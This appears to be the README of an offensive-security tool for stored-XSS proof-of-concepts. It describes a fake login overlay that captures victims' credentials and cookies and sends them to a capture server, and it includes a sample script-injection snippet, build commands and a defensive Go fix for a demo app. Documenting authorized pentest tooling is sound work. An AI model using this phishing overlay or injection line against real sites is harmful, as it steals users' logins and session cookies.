Stop doing `alert(1)` for your XSS proof-of-concepts. A bare alert might be trivially dismissed by triagers ("cool, you can pop a 1, so what?"). A plausible-looking login overlay, with the captured credentials landing in your terminal, might get more attention and is a better PoC.

fauxfront generates a small JS payload and runs a hardened capture server so you can demonstrate a realistic attack scenario for a stored XSS in bug-bounty and pentest writeups.
- Drops a pseudo-legitimate login card onto the vulnerable page
- Captures whatever the victim types to your server
- Optionally exfiltrates `document.cookie` on load
- Cookie-busts itself so the overlay only fires once per victim
- Closes itself cleanly so nothing looks broken afterwards
- Logs captures as compact, screenshot-friendly plaintext
This is for impact demonstration after you've already proven XSS, with authorization to test. Don't point it at users or systems you haven't been invited to poke.
```
make              # both binaries
make build        # just fauxfront
make demo-app     # just the intentionally-vulnerable test app
make linux-amd64  # cross-compile; also darwin-arm64, windows-amd64, ...
make release      # every platform in PLATFORMS
```

Binaries land in `dist/`, named `<bin>-<os>-<arch>[.exe]`.
```
$ sudo ./fauxfront-darwin-arm64 \
    -addr :80 \
    -plain-http \
    -title "Sign In" \
    -grab-cookies \
    -attempts 1
listening http://localhost:80
capture   http://localhost:80/c/f7c5d924028cb24a0540ef7fe132d6a01c9c66ed93e9e7ec
payload   http://localhost:80/e051.js
injection <script src="http://localhost:80/e051.js"></script>
```
When a victim hits the page:
Screenshot. Paste into your report. Done.
| flag | default | notes |
|---|---|---|
| `-attempts N` | `2` | submissions before the overlay closes (1 = one-shot) |
| `-title STR` | `"Sign in"` | overlay title |
| `-color HEX` | `1a73e8` | primary button color, no `#` |
| `-logo PATH` | - | image embedded as a `data:` URL in the card |
| `-grab-cookies` | off | also exfil `document.cookie` |
| `-payload-path STR` | random `/<4-hex>.js` | e.g. `a.js` if you want something specific |
| `-addr ADDR` | `:443` | listen address |
| `-plain-http` | off | skip TLS (LAN / homelab only) |
| `-cert` / `-key` | - | LE or other real cert+key PEMs |
| `-hosts CSV` | `localhost,127.0.0.1` | SANs for the auto self-signed cert |
| `-log FILE` | stderr only | also mirror captures to a file |
fauxfront-demo is a deliberately vulnerable guestbook for testing the whole flow locally without touching a real target. It stores comments as raw HTML and sets a few dummy cookies on load (including one HttpOnly) so you can verify credential and cookie exfiltration end-to-end.
```
./dist/fauxfront-demo-linux-amd64 -plain-http
```

Browse to `http://localhost:8443/`, paste the injection snippet as a comment, and see it fire.
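The demo guestbook is vulnerable because it stores and renders comments as raw HTML. As an added example (not part of fauxfront or its demo app; Go is assumed because the cross-compile targets look like GOOS/GOARCH names), here is what the fixed rendering step looks like: each comment is HTML-escaped before it is placed on the page, and the response carries a Content-Security-Policy that refuses scripts from other origins, so the `<script src=...>` snippet from the banner above renders as inert text instead of loading the payload.

```go
package main

import (
	"fmt"
	"html"
	"net/http"
	"net/http/httptest"
	"strings"
)

// renderComment escapes the stored comment before it reaches the page, so an
// injected <script src="..."> is shown as text rather than executed.
func renderComment(raw string) string {
	return "<li>" + html.EscapeString(raw) + "</li>"
}

// guestbookCSP is defence in depth: even if escaping is missed somewhere, the
// browser will not load scripts from an external origin, which is exactly what
// the injection snippet relies on.
const guestbookCSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"

// guestbookHandler renders the comment list with the CSP header set.
func guestbookHandler(comments []string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Security-Policy", guestbookCSP)
		w.Header().Set("Content-Type", "text/html; charset=utf-8")
		var b strings.Builder
		b.WriteString("<html><body><ul>")
		for _, c := range comments {
			b.WriteString(renderComment(c))
		}
		b.WriteString("</ul></body></html>")
		fmt.Fprint(w, b.String())
	})
}

// servePage renders the guestbook in-process and returns the CSP header and body.
func servePage(comments []string) (csp string, body string) {
	rec := httptest.NewRecorder()
	guestbookHandler(comments).ServeHTTP(rec, httptest.NewRequest("GET", "/", nil))
	return rec.Header().Get("Content-Security-Policy"), rec.Body.String()
}

func main() {
	// Constructed sample comment: the injection snippet printed by fauxfront above.
	csp, body := servePage([]string{`<script src="http://localhost:80/e051.js"></script>`})
	fmt.Println(csp)
	fmt.Println(body)
}
```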
- Random per-run token in the capture URL path; unknown paths return 404 with no hint the endpoint exists
- Random per-run payload path (configurable)
- 4 KB body cap, `Content-Type: application/json` required, JSON-only bodies
- TLS 1.2 minimum; auto self-signed cert if you don't pass one
- Loose global rate-limit ceiling that legitimate victim flows never trip (exists as a DoS safety net)
- No arbitrary file serving, no directory listing, no information disclosure from `/`
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for more details.